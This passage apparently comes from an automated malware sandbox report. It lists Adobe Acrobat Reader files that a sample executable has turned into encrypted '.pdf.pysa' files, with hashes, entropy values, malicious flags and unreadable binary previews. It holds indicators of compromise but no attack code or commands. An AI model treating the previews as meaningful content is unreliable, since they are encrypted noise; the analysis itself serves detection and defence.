.t5..Ne,....."@.h.*.....d0..4e...#...,.`.0.hr.l.l..F..-Dic.2rK.?...:.i89Y.O.gW..b<7..DJ.._..........M.GD.;L...+.+s,..&.pO......w.'QiS.....{b..4...6..F..f....`..9x...ei.=.X.*..k......h..x&r&.iU..
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Light.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):309248
                  Entropy (8bit):7.998942222461106
                  Encrypted:true
                  SSDEEP:6144:ZCN8OxBluZug6EJc5v1tkZishLhbH3YuG64PNE1wvIbnK:ZCNxGL+l1tGis/bopdPNTAO
                  MD5:6D5C63BAC17DED29387D902121A9F80B
                  SHA1:F2E30B6A8ED19F325606A192686EF354E483372C
                  SHA-256:114D7E3EFAD13375B989303544797D9BBF3E02AB58F4D9E37722FDA6D3C5B07B
                  SHA-512:2D26CDE44869FA032F8AE1941A28D113876A003675C11CC90090A2B1D416973CC751AB35F309128E2874D9D84244AC15169178BF0AB6AC3EF9A7F4F950736532
                  Malicious:true
                  Reputation:low
                  Preview: .HY.u..2P...;........{..l.H.............2.|...Q.F.c..h.......O9.n!...w.........KC......7.e...Kh..Rn..Z...A......p.8.a....F.7.X.,h..gi!k.W.<J.....b..N..+..o...H;....0..l...<L-N.jBm.q.Ef+.w.....%......?.:.R.HT.QT..6@7&m1..u.4..^.G.......,W..q..././<..u/#.|%:0[..d=^s...u..w.Rbu.P..;..'...pH1..?.a.!..Q6.R.[....Z..?v...Q}..z..G..!1...P.....xC...7..Y.."|..LW....3&...Ky...N`...a`....}....88w...)...o./..c.7+>.3..l".L.XP...bT.j.._....."..S...>.E.S.8-Ik?../#..l;7...?.I..}.m.'...Le.f..........S#{g6.an._........&Z.57!.+.}.g.Qw....lB`v.....T.. 'A.z&....-f."4...X[..@....6.G..U\i..-..|...(..XR].W.Y.S....Q./..l...........e..o..........Y$bkW.H....lXkmh....C...k..I.z3D.........R....@..5. .*..=,e5.^..Z..B...B6uc|.>S...4...?^..w h.xi...S.8............$.2v..I$...eA.N..M..]..i5..).j|........b...D7}..#W4s..#.Q.RvrC.q...V..*.(.Q..qA.P..g. .X...;E...G.OM.FH...>...........n.R...\...K...QMy.k>3O..\"W0.S.6`P..!.#...EL9...2..h.'...`...;....l.....D.({.zE..F..
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Dark.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):57344
                  Entropy (8bit):7.98435216821147
                  Encrypted:false
                  SSDEEP:1536:w+1+i1iTuw0R5Uu5VtBHrjIz2LdI/H6yNB+d0yitt8O4W/i76:w+1+DTkR5t3BoaOayz+6yo8vW7
                  MD5:B3AB72D61418223F05DC7916E0E92E56
                  SHA1:293C00AD64255C9F923186BB974301FB813D861F
                  SHA-256:937F935CDFFFF0E06A01B93DDFE556AC4B26EE69F688C3DBCDDC7E7AB2C3E737
                  SHA-512:F184EF71B07C126939497E03F87EA908BECE73CD0C605F4E363AD7D92890A36C8ACD339FD2EAC4B9B2F2C7EA440B6427BB0ABE45DD5D23C462895D8181D4804A
                  Malicious:false
                  Reputation:low
                  Preview: U.FY..>[..r.)T...Q.,.,.u.2#..*\p.'%..[@wq.06.].6.pKA.P..dW.[.M.J..Gn...d}....f.<.....3X.._.2...\.CY.....g.._.i-R....f..:k.a.,p.,._.h..g..f#..Q.3l.$T...ll.3y.z..`.&.....6.,...yn..*....=.d,...r.s.8..'w.X..f.....XoSq..... A.X...Fx.p.]8...y.lv......cj..e.u..........K8.C.W%... ...s...@..F.7!....{.O.mUG.A.EZ.#..QT\......0..~ |}..f....Z...&.5MVO....Y.$g......,..u...0...L1D.Z......g....K#l..*..UI....acW^....$A7.......N.k...Bb...U.,.u............e...............Fg........Ix.~.q..e.c.....DI.....@{U@'....._s..&R;$.>...@h.......v.U.rN...?...[..R*..P.5.,6......H...C.n..i...(..(...N........k..).IPk..O:..bP{Lq....AF.4./..U....K....(...x...D....D.^ ...Z.x../........$..r.9.%..g..~.i. .i.b.....<.).:C.....LP..r6.q..R...3e..w.)!..D\8..r#s......3.[E..!$..1ef...`....[.b./.oT...u...?.=......(.HU...$D..a4..}[eC..........>.Y.....R..T".q.jj.`....|.......0...l3_.X..#.}p..E..vP0{+..m...@.u.M.).(b6......Rx"...nV1..7.{.?p.....m..>;.c...P8.`....(.S.`..m.....
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Light.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):57344
                  Entropy (8bit):7.984116643493958
                  Encrypted:false
                  SSDEEP:768:FLVFEWfYaJYtW6itlNNmgcKSxeZwyZpOQ/zhFjLEqku+dmXNzRgiM4iOs7JEh:pVFEWQautWh2gcuBOSroa+sNzCi4Oqc
                  MD5:84D115EBB32FAF1DF14E3F73530F78EB
                  SHA1:CDF688FB5936BBACFCD95BDF0C7D00B4C464A750
                  SHA-256:7F847C23B533BF51C93C7A4A195EFDDCEE1D0128A701D79088460A173E56298F
                  SHA-512:8FF059B6B02A529D288FB1E0759C82819191DAFAB1F89979712ECB439EB8A120D0CC0B7F8FDB36FFE0B3BDC52B76461D974E241773F89C6F9D87EACD71EE8690
                  Malicious:false
                  Reputation:low
                  Preview: ...V%I...%.5.T...&......h.J.q.tp#...L..b....E.,IG.h..N.C+.V..B......j..e.......K.4..B...Z.b.w..........eJ...Gu..zM.E...C....R...........M.v{.>5..sm.l..#S............*(.N2..p^........j.).......D(=V..5....Z.[U.....z...[...7...MH..q..a.=0.[q.J3p.z....1.q.w?.. Cg.........3..@.l.>..j.....Aamo*....RG..T...O4uu/.x..y.. .f...t..`.e(.% ..^.l...6.cN..>.R/.7T.v..... .,.uY.c._..([.M...`%.$..-..........*:.....Cr..{.%...u....Xwq..x.5..-_..D....3..O?....s.B .+\...6.D..V.a...WVz...4mS]...e#...g..U.K.nI...v.a5..!..<...'.R....AO.:j.s..7{/....0.*..$i..GG e....HNM.eA..>.A..HJ..8-_w....8.p".A.t.../[&.l.... ...h..).........'.../.W9&..Ri\.3...s.pY.-.4..{..a.7..C...._..Y..^`.;....6..X9.jV..i.~]...G.....lC..Y5C....v3.......K.+.;.BG.t(..b..{&.=CI...&@w.m.,...<.n..*.Jq.o%.@..2.HDC.l..j..F0..-..D<m..V....}.v..a.wCa2H..e.........p....X.r.+.I@ZzvU\..K.s....Mn|..d"..54...9.._.M...u<h.n)...[.K..hb....m<....a....7.+......_.O...."<3.w...*.K#..Y...>....sq'2*.......0J...3..<
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Acrobat Pro DC.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994211569460936
                  Encrypted:true
                  SSDEEP:3072:+grOyr/Ue3VpdhnPlibxNYUaORcAYaFKOBNlzXHaa:XyPQdhPlkxNYU3vYIPlbH1
                  MD5:A1A9B50821DAE51D00DCED4F64F769F5
                  SHA1:82D59D4307C1792826A98C18FEFBAF8D7B99AF61
                  SHA-256:CB4E70406FFC35C59AF8F89EC6A08EE4D058D7AD06AAF1326F1B3C3EE0ABBCE8
                  SHA-512:9B938A0A48C9D6AA19F8A026A72BD4396BF04A6C7E252955A8CD0DF6C0EFC29B4E7CF9E0178E1F5E132217600B32340FC90EF929B7DA276D33F73C2EF2E4DDE1
                  Malicious:true
                  Preview: k'E=.p.6.5N&.W.....k:#l.O.~f).?Hd..H.E..m5....M......m..n....wv....j.....D.#..dX...0V.EH..q...T....@a....2C.kVz.4...SG.....B.50..q....{GBi.x.Dq...........ya8X4m.......~..g...'....$...B...H.....'....._........^.q....6b..s....J..t.....v.S........l.TD.O.)b..L..Bd...ko1...>...CI%d..x..EmO.t.V.J.c..q#....3~...8s.?j..r,R...^HY..kG{.a....o..o.q......u..V..t.H...v.-..dj.....Z..:ujd....f...X...#...&rT.(s5.xKRc\.'B.7...2Y'.[S.R.._..}.0. .5...<.B...<.2{.xzt....1KD..l(..!...0 8.]..%...*.....(Edj.'.l4`..j..7...S....4..........c4...0!..[.*h2+.5^&.&..j...........2...arSWEu.H-}a.].I(..2w......p.0..=5.m...:...30@...FI.t..Gc,_.Hd...(LN..U.....p....L......a..%R.....WB......c..C..Qp....$.P..&...x.._......e ..V.#m-l...!+'%4.M$.`..........@.}.(.i3...O....!.q..+.@{..t..A.F........@.....e.K..........;.X...s.|O`....n[.?.DPC._C...^>..:..%N.'....pd.M..?..!......@..K.....>.O. ..".w .;.'.f.gp..N.>.Fu....ys....>4.,.....M.L..o1..Q..r..v....R........$^..Fi.P......x..
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Cloud Services.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):309248
                  Entropy (8bit):7.9988654945972515
                  Encrypted:true
                  SSDEEP:6144:qPw/7LikFcQU4XbMFLv4n8L2tdQSEdVBksIRCn6vGV5T2n8Xxu:qI/3QQPM5M8dV6Ji5e
                  MD5:1BF1CF6881DEC7FFBC3050613DD7E4D0
                  SHA1:DB574612EF32C5A35D7F6EE911B0AAC4F26F05EE
                  SHA-256:BDFC1AD0C9E0BCB3C74A0F1A3DBCDBC0C1831FF683BC1B11DBE0C973A255DD55
                  SHA-512:5CD20167AB648A6F18B20769EFB63ED24DFD9BAA9C95E9DDAAECA437CA2E527BB3B43D236E92265215B9E43689B88540008F074F88DDF8BB8116F2C91B980BD6
                  Malicious:true
                  Preview: D.rQ..fjd.$.....&.N.c(y[7.e...DD*g..nl...{.5&..G.G.G...Q.~i5...m...n...#d`z...0."4............_J...Rea...m...5..t*.X..BA...N.:...6[.Q..'.]%..DxVn.r.@..$)..]...Q..u...5.y.B(D....m..6.>....q4.Q.0<..g.1....o...j...bZ0...da...@..R.M.I*.,.OU.!..8.;;>.:.@.A.:5.._..2C.q.u.s.]Z.k.....]OU:k^..^.".D..... .T?......[i.@.+........G....O..D6.~....(.....Z../....e.Xni....4..}Eq.N...kd.....s. .....f....R.P.h.(...~D}L0..M!......V..#.....hVb>..bVMY....G./#s....~..:..g....X.0...S,j.......Pt~.XG.I.Byt...EH.{..%e..a.D.'....Ii.....oPQF......z.D....+...J0.bE).wz.i.:...)...._....J....+*...m|...O.u"$.".'.........6....&.Zh..Fc..A....|9{...?.......",c..O.9.?......E...-Zrh$l.k.q...)..!Y8a.......i.H...=..X8.eF6W'k.....v..7..K.....{..`....lp.8.; ..?#..1z1._pP.;.5.r...iJ........C.W.pF.)6.[.zQ.~_.0..F.4....kZ.1M.Zj<.Zd:.......;...m...k:.6E.W....).{9........'.]..k.'9|.e.V.7.[.cN..Wo..[:...."M&..|.........d..eA.5.. ..B.@NA.s.G...0nta....78...mef5.'?.E.-X......k.y..C.^4..M.
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):411648
                  Entropy (8bit):7.999210711184984
                  Encrypted:true
                  SSDEEP:6144:4WR58BJWf9muj2WItsNHMuA4QNPWf1PZQlvwpht+W8LQ1f/scTl/J+gk/3gom/nP:4K8ygtsyT4EwzQvwb8LCfhxzoYGBa
                  MD5:E020466C0698798EC48A3A162D1DEB6B
                  SHA1:9180DF378B3AEE876F42610B3CD08C0C21A39A35
                  SHA-256:D45030CBB39BB961D48519A3A15805A0552855BD878A6C9136768D8876013EF9
                  SHA-512:F755C2544E47541A9F5091A939D037685E78E4320C7C5DF3173075B942435883DF2F97950782C70DBE452F494E8CA9379C98F145F0F10B4FD970FF2CD857793C
                  Malicious:true
                  Preview: P.....d.}.{.q..f.A...y..;3L6H.....2;.4K.,L..b+.. 6;C&.C..<Y+...z.....2.....$...?..jFy.....5v...V......<...Qp...B.\...St.G...E&Z..@...!^Pv.......5OJ@...F!'w}'.KH..B.T...h.k...@.+S.m.f0S.?J.u.JR..d...Fk.......e?\....L.}..*.r..y...w.:p..n..sh.{.\.....V.N.tRw.W<.#t.............<.....S.[...[r..fb~0pED..*.K.....y.I.....{.w...."..TJ.>B.|.X6.s....J...8.+.#..Z.....*...L.%..4............F...\.n.=yGd.."xl.{.s.......@.-Y..*.qv.....e I...8,Z..).2.Y...|...1..?."....?.?w.*.e.....`..~...-.:.">....sDc....F..bv........L...(U..7.[.r..b#.....(<..Q..L....$dpRU.......A?^..3i.&...J.i.R.Q.PPRHu.....!&o.Y.oO...R. z..W.=..........=.....[.`.V...3.i....[..&+.P.`...i.).@.,....g.Y...f.....yJF..0K...Q_C.Z.....7.1..CbZIb@=..&...j...(.u..D.A.t.?0..{=TX..n.$E.p..9NV...@j5.9...9PN..U=......AI.y....=.......(..r+.q7F.?..4.u.......0..^Ym7........%..&.}.=.....P.O.s.s....S...{..@.8`'..n}.......n.fd..'Q"&..4V..1_#..ut..G.k..)-..G3..{QC...4=a.x..ie.........."....C.d..
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Bus Schedule.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):923648
                  Entropy (8bit):7.999709357014231
                  Encrypted:true
                  SSDEEP:24576:fdmwBVdsk6a9BtNjo+wLw7kwB5cdNq5MiC4FKscMo4:FmCsN6BP3wuVB5GNtkKVMd
                  MD5:40D01C03D15196CDB9A7B15D1D7CD9DE
                  SHA1:FB622A57D971EE6B85D735142092E8FB8612CE61
                  SHA-256:6C4EDE9E1FDC486B99765725A3DD4E89708754B8430814E8EC165745D5FAB291
                  SHA-512:F4F30FCA2E45DB0BCC6F3C1BA91CA3926BBF36DE24B97251A7C30A62AAF8ED515B1F5FA578913902E3A5DD70E163D8CDEF9E87C735BE8AD05765A9CA8EA91C2D
                  Malicious:true
                  Preview: ..n.x....n. ..uY.u.!.Y.2.#.....l..H...' =...A...tu..^.{..WZc.9.)..K@...i....[.. >.....$...]...H.....Yky...U...A..%.e.@.a..5..\mq(.i..l.*......l.:KY...../v...s$B,<.npS\.....W.....m.a..e.YF.;*l-..j......V.?[.}..a.\.GO'.e|S.G...^2.8....%5B..b."..&t?...V..3..\.LW..x....$.T.Sz..8....C-@..r..WZ$S.Kw...N...7Y.... sIi..f......J........zg.,.&W/-.z....... ..l....S.....Nw..\.......U...0..].9..X.....n.X..=.....r.at.W.X.u...q7.t..[...n....N.D.(.*._.M..R}..C.3w...Y.'Ec..ZX:m..HA`...`..a..e.d.......Rx4...~.+.0.....9L...x.....!D/.Q.U.jU.D.{.O.....,g.A..)J.....`t.Pe6)/..J.o..HSR.VONPa`...y.s.L........}..../C..@UBt....pF....jM0M......[...3..Ls.7..fr.....#:.o.(.|I+......!u..V^.*+..v..b.|.|hb..U`oC.+....~..H.j|W.w..*ik..gB...E.2xV.*.i.f...0.BB...(.DU}....v.o.O..\x8`0...47..0p.@...~z.H.!\..%.`'...TT)....5@.Z..1...a.n1.n...7ht./...E.....6..._O......A?....U..8.$.............n.r.8..gdn\...f*c*...s..M.....=...3..e...I:.|j.gW..q..A.i...T9..;)....atR'...dR....*T.
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994737334542135
                  Encrypted:true
                  SSDEEP:3072:IUhykdRw+INYtqpgJB0DBfr3Z8CCBmxuV:IUhykdC+INYYpgMDBD3Z8KsV
                  MD5:E12297B410BEC3FF9A4A93C83969308E
                  SHA1:1412E67518DFE75717386376CF85474D37D32D7F
                  SHA-256:7DFE1FAAC50A00823300A14321B44DF528972A2A14544D50EB76DF22244C03BE
                  SHA-512:EC2D804E015A6B0120EB9A934889F53FF51DA2471E2E2DA86ADE3D90A8299F3F94254D72187CDC754F84EBDBB5B5BAA1EB7157AEFFDAFD92AFA4793E3C1BB0B4
                  Malicious:true
                  Preview: ...T.....M.*...E.w...mu.....x..O^.m.).........Gs.j.......WMO.XA..' .|..Gmg.'..8...(...S<Q......Qo...._....iWej......e.....t\\.Z..Z.4T38.v...Ey`...?|..M.-.0d.)_......iC..YU.x.U.W.t.yk.X.S&p.Wc...pp...6.t..T.........~...s.O......9.....5*...T.6..yt.[...m.....%..Q..8O#....v7D`=..?j..R+../=..zu.......?..J....".C..d=..P tm.......W......-L'8..O...<~/.;..&.p......]..Q...Amj.N.\.?#>..J:.....+N...I.U....9...+H.....x.n....6......*.ND..J.....3S..X.I..C.......j...1....a_.-r<...4...CD..y..Z.]......_.$...>..o3...h.X......>..L%uQ.y..rp.~.......&I.g....k#s.92?.....p...6..kO1.$).6....bD.8S..~C..S.".<0W&Z.`$...`...o..].f...xc.#.@..Y.......O.N\..@.-...U;5g*h...7.z..M....k.5.Z.CVN.(.\...l.x.+.\r..I.,..-.o......J.9..Y(M6t.%of.s7}4.r-.*CS.O<..WdrxRJ..j8O0...}.3..3..F...)..V......i;..k.)..=}..t.Y.!.z.N..H..1..g..Q..B.u...m.../[.'..1.C.U....E./..%.\0?`5.Fs.ZJ......Tl8..P.y..Y.{...%Rh...].8...L.:?$..;NNe......'..du&j4Te.].....I..l....e.....V..r.........#...il.-)
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):78848
                  Entropy (8bit):7.990936632219131
                  Encrypted:true
                  SSDEEP:1536:ETdURrqUpWxDPOYNZU7+FkvwnLYvq48r3WRrqcGMpKHYaLISK0:sdURr7/FbaqqYrqcGMsYaLS0
                  MD5:AB886B38C82F2CCDF7CB3849705EBB64
                  SHA1:617117DA83A25307A2C9FC629028CD43D3E3345E
                  SHA-256:75E4D28341B1601668E0FAB6D4FC40912EE9A9C08B55569B2C29E80C08D17ECE
                  SHA-512:6E5F01922D064536ECA50EE7DD05A884692995CBFC2AC39F1001A1C1D637A4248A13BA0259FBCC25C8AABEDF4B2401A7AE6795020899239F15A4DD170588AA0F
                  Malicious:true
                  Preview: .....b..[....$N.........G...fz.8t`.........~l...|.F..<(...V.>b=..jt.[..G...{.`.3....T\2.....W.<Js......<.h......eU~*...@.[%...4..F|.{.J.^.mb=N....=.c.clf..Ex{.........JY.u....N...h.>..Y.k..:.l...C ....RHP.._V..3....%8.......M..B..p.6.w.f...Br.3..c.T.4....+........-:5.Rm.Z..zEG.F.2.p..).)..G4..3..+.d....7^%....3.4.h.[...]...*...E.)pd....rCv.....J..........9.F.~p9).p.g.F .o..r....r.m...52..6...H.L~.n.E]yB..3h.....q....F....-p.[.|;A..gR.K8......\.T^#PS6Qw/..:..........%.v.....|.m...`f......hkZ.!..J.RU.6..%..^`J...{..|W..C.-.?............-a...J..U...,./g....1w..I./)F..a.N~.Q_...H.....E......(- ........LP.i.^;j..qm.(.2....YV0.!Q.<.....t3.h.l1.]....'..YL...-N..O<.b.g..i....S...L...@[...xk.T.^@..|..b....edJ....AC.-...%*+7...o.....+}=.U.-.C:....|.5J.cw<.xt6...\.:/5\.o..y...........N..H.....>.........T..$.?..E.S._...j4....Gf........n....@...j......A.P..%....ae....+.L...w.......*; ]...}.........X....x)#.l0.>Wp..d..e.y.=..h........,~........).
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):58368
                  Entropy (8bit):7.985038711177283
                  Encrypted:false
                  SSDEEP:768:LSpxASgsaSEGROdrKCiSaLO3RA/ygxxSu2PdqrS1/Qat4olUgDn1mU3JsEYemrLQ:L0xssxEqOdrKeRExnwd0Srpl7D1hAs
                  MD5:86C6DE994F2D72072BAE9A104B86797D
                  SHA1:2A7FBAA1F195E82FF57B46EDA5550F0491DB84AB
                  SHA-256:9700D570D435296CBC9849933E620849D424A34D7D8D6E745E8B31BED0985FB8
                  SHA-512:03103F4E5A67D2DB328EBE7D1CF080253F337AA86EEFCF5394EC14B484F6966FC894FBD0E899C47C04D248C8A3B318CB9B0990D2EAFED1D8F79CC8D58C20B6A3
                  Malicious:false
                  Preview: ..u.uY$.mp..@.F81..J...f~......Xq.(.|..',g..h.G..p..(.4.-j..T.....e...0...N.......S..}..Nu........'J.....h.5.4OOZ....@..C..8"..<./[.a..;W....rh.:.7.l.......P..&.&:c...h.C9.MM.\;krd......N(.S&.vf1 .T.;)..^../...@.]e.^.(r..a..;.m..~.V/..QZ.....sc.r.Z..................8Aq:.......fl%z...Z..%...w.....>.^8J%3 (n....|..b.f.B..>.}...&9.'.).E...t.M..2...Iq..T...\Yl..1..?(5u..x..te..'.;(...x.-.+A.+aWX....8.t[.U..H_......+.^.9-...<5|..#i.k.P.$..k....h.i.esm`w+~...\f;..., ].bvh.... .^V.X;.J%.a..dy...q.2V..@....?....Z@.t..W...{.'.+.h....H.f.F.syb..jU.......p...?.._..r..... )..`.....,q.p..F...J.Y.2....M<.NFL..I..]..t.0*.:...t.oR.>.vk....s...G........8.*...;..cG.......7..@:A....I9.._.T....,..R...........}+n....6....n...........m.2..K......U.;.P..F[...|...E...x.Z.>o.Q....O..F.P...;.w5.^K..p....lt9....L>p..[....0......y_......J ......s.*.\..!..3..aj..;....h..R..u~..P..r.. ....jn.i..Q~..l..J...s......q.BR....5.P...du.B.N9...........2..6.w...d.y
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):41984
                  Entropy (8bit):7.974353015916477
                  Encrypted:false
                  SSDEEP:768:gPZYEBStOSQ4gE3lL418royLt56AAB4o97JaYT6YYwBLQxC6Dvh9M872DD1t6Kmt:kPSE4tLi88+JAqGJrT3DBL+C+vt2n1Jw
                  MD5:CC8F17DE7C277761C3820340DE682B0C
                  SHA1:C591C1374CC7AFB41B53CB4A0E0A4A1928D611EA
                  SHA-256:B6E4A30A5F97ED93786ADC75DD287DBA29D1715718E27CC03B849B1AE84EF293
                  SHA-512:87E7DFC3F0CF376590FFD2316521EA86490CDA1FCB8697DA9253F1F2E418CFD6489283A74745DB8A0FA548BE6A9FA645AAF5A5B839D03FD0EFD6D068F02BD2DE
                  Malicious:false
                  Preview: 9L~G..#o<E+.....d...m"X.......7.*.......-..DK.F....l......c/..4\....7.I.....t\.+.....-...1...o.._..6@E..|...".k..S.B./:.....T.4.}....r...._w[.$...;.Q./.^.........H....J..x7UM..Cx.f.m......~..........C7...{5...y.....5.b..F.<Py..L....5|.{<..>R..F........'/S."2.....xd.ny....u...$A..:o.t..[.........VD. .7.;.$...=k....VLX....,...J...]f^..."..;B..Gs.V.......E...q..X.+.\.W)......{X.-.nJR...x.?X/:;i\9k...v.]...tm0.>..x...19..J...4.~.-exIgxJ<...]..|....=.<......eJ.h.....Bn.:.%..g.Mx/..#b.-No...5r.u....K....~.X9.6pZ3.T.H5O.R/>.T.V...K.....!.G.4.q.....G...K?Xkl....S.......".j}.!A.G....5T.i..._......~O.....^..Jo...Ge.0.50n...<.T'C......NK.K?...MGIh.YP....A.o.\...7?N...Z&....x..Q...e...8d.{.....=..~....q..)....._...!.r./..A.V..|CqK`..(.(wL+^.....B..1Y.R..]Q..;|......~5..F'O..{7..g.E.%j.A>.Y........#....v.U.+j.w..(...mfU}"7......cZ..YV/.m..~.........VC..U...B..#....c.,...,...c...)<.e..+.Lb.....g$@.:..$....|.EO.+.d$P..v..8...G.\Yy.j.....JO.!.).'.@...[>..K..Y.
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.993980861524835
                  Encrypted:true
                  SSDEEP:1536:QbiusZJW1rIR6Ki9yaIlZ1gONI7QPuPU9SoHJG9x4GbWOAx09IQasDNeV:Ij2if96lLg+I7KLHJU4Uw8RU
                  MD5:864AD02F8A2C31370037C1251F6A3F9A
                  SHA1:902994D9DE21E74A3A6D2E1AC1EC3487FEAC2FC5
                  SHA-256:CE118F402BDEA4DDB4163C8D3E984CBD21506AE2C78A9D7080CE2FC5B4D849CC
                  SHA-512:A7E6BC6ABEEA4432D7B82A3351EDB660006FEED7A386859FB4946A0101CA9AE773E0BB0F1F12DCCBE0C2F8C6B9ABA624CC227E2A65876A6A2305F7AEF8C7BFE1
                  Malicious:true
                  Preview: i<X....x....6k;%..%k........R.).......1c}#6....M..&I.%..._.%.......<...`(}!Zw..|..!.5.c..}M.....,(.."..w.q.2..=0.lr...>.zH..P]..G....W.VA]..>..v.\Y%.k9RD...Xl..b0.....SR....;.......v....yj ...../Od!#.*...LN..........U,..N......[.;9..T%.7..g?Y=.l......,..K! ...xKW.g...tr..]..)..q.>...tfR!.$....[..g..&.....h....}..F.....N.u~.Kz..a.|...n.!.#..C.b.l.... m.5I..l..2.....ewt..y...5..N.k.1.EP..;=.z.+dj.t ..f......S..!sw....c....v..Lo....U...@.D...s......E..T@.1.G-A.EE.%.~0.}.;i4p.....&.P..e.d`...m...:.Q.L.....@..W. .AJ..}.....s..%zK.)..U...9.T.7..........i...\.."2..=.C../.@.y.u...<yy)......j..X....JW..P9L_E.9.._o.....:..%.E-D.}.J.`.].cc...M..D..jm<...G.......4..L....7*.$}".P:+..........(..i.7..5Z.'N4>..._t..h........sfu........5.|.%.n4.MO.>..i.:.2o.w".fV.I+...maa.N.L.....a`..._...r....E.._53...Y0}.Q.q.q...&,\.w.q{..?.;=.+.|fX8...~@..a0..'..jr.}....R..>.K..u...9.q;..)......64"i...3G9x.H.O4.....r..Z..o4v*..u.b...=....b.r-&.a...c.9..H.M.Nita..$..cP<...X..5. d
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994374073707696
                  Encrypted:true
                  SSDEEP:3072:uDv8Cl8Auet52Ps7PDJcxkKglPj/FXjoLglo0:unQC2MSkTZXjoW
                  MD5:9B2D7D8F4A870AC8C808ACFA4DD81B48
                  SHA1:065AE4CFABBBF2CC51414A640B17A5DDCCB69E7E
                  SHA-256:5A61323B48EE3C1446D1ECA2E67187B743A9601FDFC182AF8D502E6BD249230E
                  SHA-512:4087261A29AB3D52881B0381FF402868B34C1E50B6AABDE113F8E6F4993277C5738B89BA73DA048D7158053D29F171E705D330384A8185697C7EE022FF3ABBCC
                  Malicious:true
                  Preview: ..O1...<s.......T.7m........._k.`s.L....cuU....0....,.X...^..y.DI*.]{..t..P.JhC..Z..o.N\./.....e.$'.....%..s.g(..}....z].....F....pT.fM...R.m......6..M[..(.dQ<..#.U.....]..VN.....*.......*..n"r!.v..s..k&g-J`..u.......q...#...>.0...63O>Y.:a...I...3....p^...4J67.g8.......8e...-..<g5.j.V*.@FH.j Y..Y.d..T..&.7J...|KC.3..p@cHp....L....pP...%4.....1..}~.i&.`m.K..".V.p.....N>.V..T.....wz....;.Yb...1..B...Wn[.z..n.t.=....>..@.V?):.ZuV0...2.J\..p.@_...A.....t....U6y.........H......\..L.|....;z...~.+.h...].S.[.:..dw....<:.oFUp475'h!q[-OTH@...............%_..-......!dK..UvA..q..Y..R!_ .9']...*..p^Bw..Z.Nx..X#Z....3 l.4F5K...3@.6......=.*..B............^.p*,82^....5%WE.Dbbh.[..RQ.E...8...Q.F.P@.}X.K..<....tav.....Y.....m....C=.O.-qU..e.(.wm).3.....<.2..F>...R7......r@.n.I.m....&...5..pWQ.~..*U...';.C./.....>@.....P".A....m....:.e...!s...K|H..4..!>.Q..........H*4c......5.. K.zPx..$.)..P$..S.......C")..L..!.(....@$u...n.$.l..G.g.B......^.M3E....8
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.671702072291653
                  Encrypted:false
                  SSDEEP:192:oqJal3W/lUaU/dd0Y2DuoT/Z8g+fbRd5qmnGJj85R87ADqpBHgbyb:XJyWdUaU/XqZ8Lf5dns8R8+kB0i
                  MD5:5482223898DF4C0548A73ED5793E8471
                  SHA1:B1259AD876F6B3D1C8DD76175C2018D6C79578DE
